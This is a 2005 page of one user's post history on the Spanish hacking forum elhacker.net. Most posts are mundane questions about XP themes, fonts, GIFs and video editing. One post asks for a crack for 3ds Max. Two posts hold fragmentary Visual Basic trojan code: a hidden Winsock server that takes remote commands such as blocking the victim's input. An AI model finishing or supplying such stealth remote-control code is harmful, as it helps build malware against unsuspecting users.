elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 [8] 9 10
71  Media / Diseño Gráfico / Modificar themes xp en: 6 Septiembre 2005, 18:41 pm
Bueno, ya me canse del entorno grafico de windows...asi que me gustaria cambiar.
Busco un theme estilo Mac...pero que el boton inicio sea normal y no una manzanita...tambien me gustaria poder modificarlo...he buscado en www.themesxp.org pero no encuentro lo que busco.

Saludos
72  Media / Multimedia / 3d studio max 7.0 en español en: 31 Agosto 2005, 17:24 pm
Hola...me estoy bajando este programa pero lo malo esque esta en ingles...me gustaria algun crack o la version en español...alguien sabe de donde la puedo bajar?

Saludos
73  Programación / Programación Visual Basic / Lo basico para un troyano en: 19 Agosto 2005, 01:12 am
Bueno...pues ando algo confuso con esto de los troyanos...siempre me dan fallo...voy a postear aqui lo que realmente ace falta para que funcione un troyano

--CLIENTE--

Citar
Private Sub Command1_Click()
Winsock1.RemoteHost = Text1.Text
Winsock1.Connect
End Sub

Ir añadiendo opciones


--SERVER--

Citar
Private Sub Form_Load()
Me.Hide
App.TaskVisible = False
Winsock1.Listen
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim abrir As String
Winsock1.GetData datos
Acciones

Eso esta bien?Se le puede poner mejor?

Alguna ayuda plis...
74  Programación / Programación Visual Basic / Gif en form en: 18 Agosto 2005, 19:14 pm
Hola...como puedo añadir un gif a un form? y que este cuando se ejecute se mueve (actue normal)?
Lo he metido por picture box e image...y se queda estatico...

A que se debe?
75  Media / Diseño Gráfico / La font de msdos? en: 17 Agosto 2005, 19:18 pm
Alguien me puede decir cual es la font de msdos?
La mas parecida que he visto a sido la Times New Roman

Saludos
76  Programación / Programación Visual Basic / Simular formateo... en: 17 Agosto 2005, 03:04 am
Hola...estoy haciendo una bromilla y estoy buscando cm simular un formateo desde msdos...no se si ponerle desde un gif o poner un fondo negro y la letra parpadeante...lo malo esque no se cmo se pone para que valla saliendo las letras...poco a poco...y no del tiron....me entienden?
Y si no...donde puedo encontrar un gif?
77  Media / Diseño Gráfico / Cual es esta font? en: 16 Agosto 2005, 22:50 pm
Hola...he estado buscando por dafont.com y no consigos saber cual es...
Es http://img112.imageshack.us/img112/9600/nav3ka.gif

Aver si alguien sabe cual es...gracias
78  Media / Diseño Gráfico / Fondos para mini Banners en: 16 Agosto 2005, 00:47 am
Hola...necesito fondos para mini banners...tengo alunos pero son demasiado pequeños y no encuentro letras que le valla bien...que fuentes utilizas ustedes?

Saludos
79  Programación / Programación Visual Basic / Problema en creacion de troyanos en: 15 Agosto 2005, 23:00 pm
Hola...he creado un troyano muy sencillo por ahora..para despues irle añadiendo cosas...

Lo que pasa es que me da problemas a generar el exe del servidor  ???

Y me da error aqui:

Código:
If datos = colgar Then
    BlockInput True
End If

Y aqui tambien

Código:
If datos = abrir Then
Dim res As Long, ReturnString As String * 127
    res = [b]mciSendString[/b]("Set CDAudio Door Open", ReturnString, 127, 0)
    End If
End sub
En los dos me da el mismo error, procedimiento sub o fuction no definido

Alguien sabe porque?
80  Media / Multimedia / Acortar Video... en: 27 Julio 2005, 02:23 am
Hola...pues quiero grabar una pelicula que ocupa 732mb en un cd de 702mb....he pensado en quitarle parte de los creditos y eso...con que programa puedo hacerlo?
Páginas: 1 2 3 4 5 6 7 [8] 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines